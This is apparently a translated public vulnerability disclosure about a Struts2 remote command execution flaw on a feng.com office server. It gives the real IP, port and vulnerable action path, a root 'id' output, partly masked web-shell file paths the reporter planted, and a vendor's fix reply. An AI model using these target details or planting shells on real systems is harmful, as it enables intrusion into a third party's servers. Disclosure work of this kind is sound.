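2015-05-10: Details reported to the vendor; awaiting vendor handling
2015-05-11: Vendor confirmed; details disclosed to the vendor only
2015-05-21: Details disclosed to core white hats and experts in related fields
2015-05-31: Details disclosed to regular white hats
2015-06-10: Details disclosed to intern white hats
2015-06-25: Details disclosed to the public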
I had originally wanted to dig deeper..
Bound domain name
http://office.feng.com:8099/
Struts2 command execution: http://113.108.53.7:8099/system/systemLogonAction.do
root privileges, direct getshell
root password
Shell addresses:
1. http://**.**.**/for.jsp
2. http://**.**.**/js/js.jsp
I broke the site.. please delete them yourselves
info
[/usr/local/software/tomcat/webapps/ROOT/]$ id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh
Partial DNS information
Partial information from 192.168.9.30
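If the site is not in use, shut it down, or block access from the external network.
Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2015-05-11 10:20
Thanks for the reminder, fix in progress
None yet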